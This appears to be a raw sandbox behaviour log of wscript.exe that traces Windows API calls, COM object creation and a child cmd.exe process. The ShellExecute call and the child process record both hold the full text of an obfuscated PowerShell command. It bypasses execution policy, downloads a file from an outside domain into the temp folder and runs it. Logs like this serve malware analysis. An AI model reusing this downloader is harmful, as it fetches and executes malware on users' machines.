	[0144.858] MulDiv (nNumber=1282, nNumerator=100, nDenominator=2880) returned 45
	[0144.858] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.858] GetTickCount () returned 0x34642
	[0144.860] MulDiv (nNumber=929, nNumerator=100, nDenominator=2679) returned 35
	[0144.860] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.860] GetTickCount () returned 0x34642
	[0144.862] MulDiv (nNumber=939, nNumerator=100, nDenominator=2821) returned 33
	[0144.862] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.863] GetTickCount () returned 0x34642
	[0144.865] MulDiv (nNumber=953, nNumerator=100, nDenominator=2951) returned 32
	[0144.865] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.865] GetTickCount () returned 0x34652
	[0144.867] MulDiv (nNumber=1053, nNumerator=100, nDenominator=3278) returned 32
	[0144.867] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.867] GetTickCount () returned 0x34652
	[0144.871] MulDiv (nNumber=1103, nNumerator=100, nDenominator=3418) returned 32
	[0144.871] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.871] GetTickCount () returned 0x34652
	[0144.876] MulDiv (nNumber=1032, nNumerator=100, nDenominator=3419) returned 30
	[0144.876] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.876] GetTickCount () returned 0x34652
	[0144.975] MulDiv (nNumber=986, nNumerator=100, nDenominator=3451) returned 29
	[0144.975] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.975] GetTickCount () returned 0x346bf
	[0144.980] MulDiv (nNumber=1031, nNumerator=100, nDenominator=3503) returned 29
	[0144.980] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.980] GetTickCount () returned 0x346bf
	[0144.982] MulDiv (nNumber=1023, nNumerator=100, nDenominator=3505) returned 29
	[0144.982] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.982] GetTickCount () returned 0x346bf
	[0144.986] MulDiv (nNumber=997, nNumerator=100, nDenominator=3499) returned 28
	[0144.986] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.986] GetTickCount () returned 0x346bf
	[0144.990] MulDiv (nNumber=972, nNumerator=100, nDenominator=3563) returned 27
	[0144.990] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.990] GetTickCount () returned 0x346cf
	[0144.994] MulDiv (nNumber=960, nNumerator=100, nDenominator=3619) returned 27
	[0144.994] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.994] GetTickCount () returned 0x346cf
	[0144.998] MulDiv (nNumber=1007, nNumerator=100, nDenominator=3706) returned 27
	[0144.998] IUnknown:Release (This=0x51f420) returned 0x1
	[0144.998] GetTickCount () returned 0x346cf
	[0145.003] MulDiv (nNumber=1060, nNumerator=100, nDenominator=3765) returned 28
	[0145.003] IUnknown:Release (This=0x51f420) returned 0x1
	[0145.003] GetTickCount () returned 0x346cf
	[0145.007] MulDiv (nNumber=1024, nNumerator=100, nDenominator=3595) returned 28
	[0145.007] IUnknown:Release (This=0x51f420) returned 0x1
	[0145.007] GetTickCount () returned 0x346de
	[0145.011] MulDiv (nNumber=1057, nNumerator=100, nDenominator=3645) returned 29
	[0145.011] IUnknown:Release (This=0x51f420) returned 0x1
	[0145.011] GetTickCount () returned 0x346de
	[0145.116] MulDiv (nNumber=981, nNumerator=100, nDenominator=3625) returned 27
	[0145.116] IUnknown:Release (This=0x51f420) returned 0x1
	[0145.116] GetTickCount () returned 0x3474c
	[0145.129] MulDiv (nNumber=944, nNumerator=100, nDenominator=3711) returned 25
	[0145.129] IUnknown:Release (This=0x51f420) returned 0x1
	[0145.129] GetTickCount () returned 0x3475b
	[0145.132] _resetstkoflw () returned 0x1
	[0145.133] FindResourceA (hModule=0x7feddf30000, lpName=0x2, lpType=0x6) returned 0x4b0718
	[0145.133] LoadResource (hModule=0x7feddf30000, hResInfo=0x4b0718) returned 0x4b0b6c
	[0145.133] LockResource (hResData=0x4b0b6c) returned 0x4b0b6c
	[0145.133] SizeofResource (hModule=0x7feddf30000, hResInfo=0x4b0718) returned 0x86
	[0145.134] FreeResource (hResData=0x4b0b6c) returned 0
	[0145.134] FindResourceA (hModule=0x7feddf30000, lpName=0x101, lpType=0x6) returned 0x4b07e8
	[0145.134] LoadResource (hModule=0x7feddf30000, hResInfo=0x4b07e8) returned 0x4b1c74
	[0145.134] LockResource (hResData=0x4b1c74) returned 0x4b1c74
	[0145.135] SizeofResource (hModule=0x7feddf30000, hResInfo=0x4b07e8) returned 0xce
	[0145.136] FreeResource (hResData=0x4b1c74) returned 0
	[0145.136] bsearch (_Key=0x232d18, _Base=0x7feddffa3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7feddf881a0) returned 0x7feddffa410
	[0145.136] ??2@YAPEAX_K@Z () returned 0xd3300
	[0145.138] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x31c950 | out: lpclsid=0x31c950*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0
	[0145.142] SysStringLen (param_1=0x0) returned 0x0
	[0145.142] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoGetClassObject") returned 0x7fefea62e18
	[0145.142] CoGetClassObject (in: rclsid=0x31c950*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7feddfd6300*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x31c920 | out: ppv=0x31c920*=0x166420) returned 0x0
	[0145.147] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x31abf0 | out: lpSystemTimeAsFileTime=0x31abf0*(dwLowDateTime=0xcea38b20, dwHighDateTime=0x1d543d1)) 
	[0145.147] GetCurrentProcessId () returned 0xd50
	[0145.147] GetCurrentThreadId () returned 0xd54
	[0145.147] GetTickCount () returned 0x3476b
	[0145.147] QueryPerformanceCounter (in: lpPerformanceCount=0x31abf8 | out: lpPerformanceCount=0x31abf8*=26957309841) returned 1
	[0145.147] malloc (_Size=0x100) returned 0x162c00
	[0145.147] GetVersionExA (in: lpVersionInformation=0x31a9d0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xe15a2dc8, dwBuildNumber=0x7fe, dwPlatformId=0xe1590000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x31a9d0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0145.147] GetUserDefaultLCID () returned 0x409
	[0145.147] ??2@YAPEAX_K@Z () returned 0x166420
	[0145.148] ??2@YAPEAX_K@Z () returned 0x149850
	[0145.148] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x31c750, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0145.148] lstrlenA (lpString="\\wscript.exe") returned 12
	[0145.148] lstrlenA (lpString="C:\\Windows\\System32\\WScript.exe") returned 31
	[0145.148] _strcmpi (_Str1="\\WScript.exe", _Str2="\\wscript.exe") returned 0
	[0145.148] GetModuleHandleA (lpModuleName=0x0) returned 0xff1f0000
	[0145.148] GetProcAddress (hModule=0xff1f0000, lpProcName=0x1) returned 0xff1fd7f8
	[0145.148] ??3@YAXPEAX@Z () returned 0x3c00040001
	[0145.148] malloc (_Size=0x808) returned 0x15f3b0
	[0145.154] CreateErrorInfo (in: pperrinfo=0x31b9f0 | out: pperrinfo=0x31b9f0*=0x54a718) returned 0x0
	[0145.155] CErrorObject::SetGUID () returned 0x0
	[0145.155] CErrorObject::SetSource () returned 0x0
	[0145.155] LoadStringW (in: hInstance=0x7fee1590000, uID=0x1004, lpBuffer=0x31a130, cchBufferMax=2048 | out: lpBuffer="The shortcut pathname must end with .lnk or .url.") returned 0x31
	[0145.155] FormatMessageW (in: dwFlags=0x500, lpSource=0x54e558, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x31ba00, nSize=0x0, Arguments=0x31ba70 | out: lpBuffer="\xd380\x59") returned 0x31
	[0145.155] CErrorObject::SetDescription () returned 0x0
	[0145.155] CErrorObject::SetHelpFile () returned 0x0
	[0145.156] CErrorObject::SetHelpContext () returned 0x0
	[0145.156] QueryInterface () returned 0x0
	[0145.156] SetErrorInfo (dwReserved=0x0, perrinfo=0x54a710) returned 0x0
	[0145.156] Release () returned 0x2
	[0145.156] IUnknown:Release (This=0x54a710) returned 0x1
	[0145.156] LocalFree (hMem=0x59d380) returned 0x0
	[0145.156] IUnknown:Release (This=0x59c0f0) returned 0x1
	[0145.157] GetTickCount () returned 0x3476b
	[0145.157] bsearch (_Key=0x31cb58, _Base=0x7feddffa3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7feddf881a0) returned 0x7feddffa3e0
	[0145.157] ??2@YAPEAX_K@Z () returned 0x1a9920
	[0145.158] CLSIDFromProgIDEx (in: lpszProgID="shell.applicatiOn", lpclsid=0x31abc0 | out: lpclsid=0x31abc0*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0145.257] SysStringLen (param_1=0x0) returned 0x0
	[0145.257] CoGetClassObject (in: rclsid=0x31abc0*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7feddfd6300*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x31ab90 | out: ppv=0x31ab90*=0x7fefdfd8d20) returned 0x0
	[0145.258] Shell:IUnknown:QueryInterface (in: This=0x7fefdfd8d20, riid=0x7feddfd6310*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x31ab98 | out: ppvObject=0x31ab98*=0x0) returned 0x80004002
	[0145.258] Shell:IClassFactory:CreateInstance (in: This=0x7fefdfd8d20, pUnkOuter=0x0, riid=0x7feddfd6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x31ab80 | out: ppvObject=0x31ab80*=0x54a3b0) returned 0x0
	[0145.258] Shell:IUnknown:Release (This=0x7fefdfd8d20) returned 0x1
	[0145.258] Shell:IUnknown:QueryInterface (in: This=0x54a3b0, riid=0x7feddfd6320*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x31ab60 | out: ppvObject=0x31ab60*=0x54a3f0) returned 0x0
	[0145.258] ??2@YAPEAX_K@Z () returned 0x166440
	[0145.259] Shell:IObjectWithSite:SetSite (This=0x54a3f0, pUnkSite=0x166440) returned 0x0
	[0145.259] Shell:IUnknown:AddRef (This=0x166440) returned 0x2
	[0145.259] Shell:IUnknown:Release (This=0x54a3f0) returned 0x1
	[0145.259] Shell:IUnknown:QueryInterface (in: This=0x54a3b0, riid=0x7feddfd6370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x31ab38 | out: ppvObject=0x31ab38*=0x0) returned 0x80004002
	[0145.259] Shell:IUnknown:QueryInterface (in: This=0x54a3b0, riid=0x7feddfd6518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x31aab0 | out: ppvObject=0x31aab0*=0x0) returned 0x80004002
	[0145.259] Shell:IUnknown:QueryInterface (in: This=0x54a3b0, riid=0x7feddfd64f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x31aab8 | out: ppvObject=0x31aab8*=0x0) returned 0x80004002
	[0145.259] Shell:IUnknown:QueryInterface (in: This=0x54a3b0, riid=0x7feddfd6508*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x31aac0 | out: ppvObject=0x31aac0*=0x0) returned 0x80004002
	[0145.259] Shell:IUnknown:QueryInterface (in: This=0x54a3b0, riid=0x7feddfd6340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x31aac8 | out: ppvObject=0x31aac8*=0x54a3b0) returned 0x0
	[0145.259] Shell:IUnknown:Release (This=0x54a3b0) returned 0x1
	[0145.259] realloc (_Block=0x102b40, _Size=0x140) returned 0xd9890
	[0145.261] MulDiv (nNumber=959, nNumerator=100, nDenominator=3512) returned 27
	[0145.261] IUnknown:Release (This=0x51f420) returned 0x1
	[0145.261] GetTickCount () returned 0x347d8
	[0145.264] MulDiv (nNumber=942, nNumerator=100, nDenominator=3617) returned 26
	[0145.264] IUnknown:Release (This=0x51f420) returned 0x1
	[0145.264] GetTickCount () returned 0x347d8
	[0145.266] FindResourceA (hModule=0x7feddf30000, lpName=0x2, lpType=0x6) returned 0x4b0718
	[0145.266] LoadResource (hModule=0x7feddf30000, hResInfo=0x4b0718) returned 0x4b0b6c
	[0145.266] LockResource (hResData=0x4b0b6c) returned 0x4b0b6c
	[0145.266] SizeofResource (hModule=0x7feddf30000, hResInfo=0x4b0718) returned 0x86
	[0145.267] FreeResource (hResData=0x4b0b6c) returned 0
	[0145.268] FindResourceA (hModule=0x7feddf30000, lpName=0x101, lpType=0x6) returned 0x4b07e8
	[0145.268] LoadResource (hModule=0x7feddf30000, hResInfo=0x4b07e8) returned 0x4b1c74
	[0145.268] LockResource (hResData=0x4b1c74) returned 0x4b1c74
	[0145.268] SizeofResource (hModule=0x7feddf30000, hResInfo=0x4b07e8) returned 0xce
	[0145.269] FreeResource (hResData=0x4b1c74) returned 0
	[0145.269] bsearch (_Key=0x232d18, _Base=0x7feddffa3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7feddf881a0) returned 0x7feddffa410
	[0145.271] Shell:IDispatch:GetIDsOfNames (in: This=0x54a3b0, riid=0x7feddfd6360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x31acc0*="ShellExecute", cNames=0x1, lcid=0x409, rgDispId=0x31ab70 | out: rgDispId=0x31ab70*=1610809345) returned 0x0
	[0145.277] Shell:IUnknown:AddRef (This=0x54a3b0) returned 0x2
	[0145.277] Shell:IDispatch:Invoke (in: This=0x54a3b0, dispIdMember=1610809345, riid=0x7feddfd6360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x31aa58*(rgvarg=([0]=0x31aa70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [1]=0x31aa88*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x166a00), [2]=0x31aaa0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x166a00), [3]=0x31aab8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="/c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu", varVal2=0x166a00), [4]=0x31aad0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="cmd.exe", varVal2=0x166a00)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x31af98, pExcepInfo=0x31aa00, puArgErr=0x31a9f4 | out: pDispParams=0x31aa58*(rgvarg=([0]=0x31aa70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [1]=0x31aa88*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="open", varVal2=0x166a00), [2]=0x31aaa0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x166a00), [3]=0x31aab8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="/c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu", varVal2=0x166a00), [4]=0x31aad0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="cmd.exe", varVal2=0x166a00)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x31af98*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x7fefd330000), pExcepInfo=0x31aa00*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x31a9f4*=0x43d7) returned 0x0
	[0146.187] Shell:IUnknown:Release (This=0x54a3b0) returned 0x1
	[0146.187] GetCurrentThreadId () returned 0xd54
	[0146.187] ISystemDebugEventFire:IsActive (This=0x5375b0) returned 0x1
	[0146.188] GetCurrentThreadId () returned 0xd54
	[0146.188] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.188] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.188] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.188] free (_Block=0xc1730) 
	[0146.188] free (_Block=0xc2310) 
	[0146.188] free (_Block=0x4f8600) 
	[0146.188] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.188] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.189] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.189] free (_Block=0xc0a90) 
	[0146.189] free (_Block=0x4f83e0) 
	[0146.189] ??3@YAXPEAX@Z () returned 0x1
	[0146.189] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.189] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.193] StdGlobalInterfaceTable:IGlobalInterfaceTable:RevokeInterfaceFromGlobal (This=0x7fefec0a1b0, dwCookie=0x100) returned 0x0
	[0146.193] IUnknown:Release (This=0x4ff560) returned 0x1
	[0146.193] IUnknown:Release (This=0x51f420) returned 0x1
	[0146.193] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.193] IUnknown:Release (This=0x51f420) returned 0x0
	[0146.193] ISystemDebugEventFire:EndSession (This=0x5375b0) returned 0x0
	[0146.193] IUnknown:Release (This=0x5375b0) returned 0x1
	[0146.193] GetUserDefaultLCID () returned 0x409
	[0146.193] GetACP () returned 0x4e4
	[0146.195] IUnknown:Release (This=0x5375b0) returned 0x0
	[0146.195] free (_Block=0x4ff640) 
	[0146.195] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.195] SendMessageA (hWnd=0x120232, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0
	[0146.197] SendMessageA (hWnd=0x120232, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0
	[0146.198] PostMessageA (hWnd=0x120232, Msg=0x12, wParam=0x0, lParam=0x0) returned 1
	[0146.199] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x31f390*=0xd4, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0146.199] CloseHandle (hObject=0xd4) returned 1
	[0146.199] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.199] IUnknown:Release (This=0x52e5f0) returned 0x0
	[0146.199] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.199] IUnknown:Release (This=0x52e6a0) returned 0x0
	[0146.200] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.200] IUnknown:Release (This=0x52e750) returned 0x0
	[0146.200] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.200] IUnknown:Release (This=0x52e540) returned 0x0
	[0146.200] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.200] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.201] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.201] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.201] GetProcessHeap () returned 0x500000
	[0146.201] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x56ae20 | out: hHeap=0x500000) returned 1
	[0146.201] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.201] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x31f3c0 | out: lplpMessageFilter=0x31f3c0*=0x4f5f80) returned 0x0
	[0146.201] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.201] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.201] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.201] CoUninitialize () 
	[0146.201] DllCanUnloadNow () returned 0x0
	[0146.201] DllCanUnloadNow () returned 0x0
	[0146.202] DllCanUnloadNow () returned 0x1
	[0146.203] free (_Block=0x162c00) 
	[0146.205] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.205] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.205] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.205] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.205] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.205] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.205] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.205] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.205] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.205] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.205] ??2@YAPEAX_K@Z () returned 0xebc60
	[0146.205] ??3@YAXPEAX@Z () returned 0x18bbfa01
	[0146.205] ??3@YAXPEAX@Z () returned 0x5cc00050001
	[0146.205] ??3@YAXPEAX@Z () returned 0x18bbfa01

Thread:
	id = 357
	os_tid = 0xd64


Thread:
	id = 358
	os_tid = 0xd68

	[0143.498] GetClassInfoA (in: hInstance=0xff1f0000, lpClassName="WSH-Timer", lpWndClass=0x270f8d0 | out: lpWndClass=0x270f8d0) returned 0
	[0143.499] RegisterClassA (lpWndClass=0x270f8d0) returned 0x9006ac138
	[0143.499] CreateWindowExA (dwExStyle=0x0, lpClassName="WSH-Timer", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0xff1f0000, lpParam=0x4f5a60) returned 0x120232
	[0143.499] GetWindowLongPtrA (hWnd=0x120232, nIndex=-21) returned 0x0
	[0143.499] NtdllDefWindowProc_A (hWnd=0x120232, Msg=0x24, wParam=0x0, lParam=0x270f2c0) returned 0x0
	[0143.499] GetWindowLongPtrA (hWnd=0x120232, nIndex=-21) returned 0x0
	[0143.499] SetWindowLongPtrA (hWnd=0x120232, nIndex=-21, dwNewLong=0x4f5a60) returned 0x0
	[0143.499] NtdllDefWindowProc_A (hWnd=0x120232, Msg=0x81, wParam=0x0, lParam=0x270f280) returned 0x1
	[0143.501] GetWindowLongPtrA (hWnd=0x120232, nIndex=-21) returned 0x4f5a60
	[0143.501] NtdllDefWindowProc_A (hWnd=0x120232, Msg=0x83, wParam=0x0, lParam=0x270f2e0) returned 0x0
	[0143.503] GetWindowLongPtrA (hWnd=0x120232, nIndex=-21) returned 0x4f5a60
	[0143.503] NtdllDefWindowProc_A (hWnd=0x120232, Msg=0x1, wParam=0x0, lParam=0x270f280) returned 0x0
	[0143.503] SetEvent (hEvent=0xcc) returned 1
	[0143.553] GetMessageA (in: lpMsg=0x270f8a0, hWnd=0x120232, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x270f8a0) returned 0
	[0146.196] GetWindowLongPtrA (hWnd=0x120232, nIndex=-21) returned 0x4f5a60
	[0146.198] GetWindowLongPtrA (hWnd=0x120232, nIndex=-21) returned 0x4f5a60

Thread:
	id = 359
	os_tid = 0xd6c


Thread:
	id = 360
	os_tid = 0xd70


Thread:
	id = 361
	os_tid = 0xd74


Thread:
	id = 362
	os_tid = 0xd78


Thread:
	id = 363
	os_tid = 0xd7c


Thread:
	id = 364
	os_tid = 0xd80


Thread:
	id = 365
	os_tid = 0xd84


Process:
	id = "46"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0xda72000"
	os_pid = "0xd88"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "45"
	os_parent_pid = "0xd50"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 366
	os_tid = 0xd8c

	[0148.402] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fdc0 | out: lpSystemTimeAsFileTime=0x14fdc0*(dwLowDateTime=0xd092a920, dwHighDateTime=0x1d543d1)) 
	[0148.402] GetCurrentProcessId () returned 0xd88
	[0148.402] GetCurrentThreadId () returned 0xd8c
	[0148.402] GetTickCount () returned 0x35418
	[0148.402] QueryPerformanceCounter (in: lpPerformanceCount=0x14fdc8 | out: lpPerformanceCount=0x14fdc8*=27282847864) returned 1
	[0148.403] GetModuleHandleW (lpModuleName=0x0) returned 0x4ac50000
	[0148.403] __set_app_type (_Type=0x1) 
	[0148.403] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac77810) returned 0x0
	[0148.404] __getmainargs (in: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610, _DoWildCard=0, _StartInfo=0x4ac7e0f4 | out: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610) returned 0
	[0148.404] GetCurrentThreadId () returned 0xd8c
	[0148.404] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd8c) returned 0x3c
	[0148.404] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0148.404] GetProcAddress (hModule=0x77040000, lpProcName="SetThreadUILanguage") returned 0x77056d40
	[0148.404] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0148.405] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
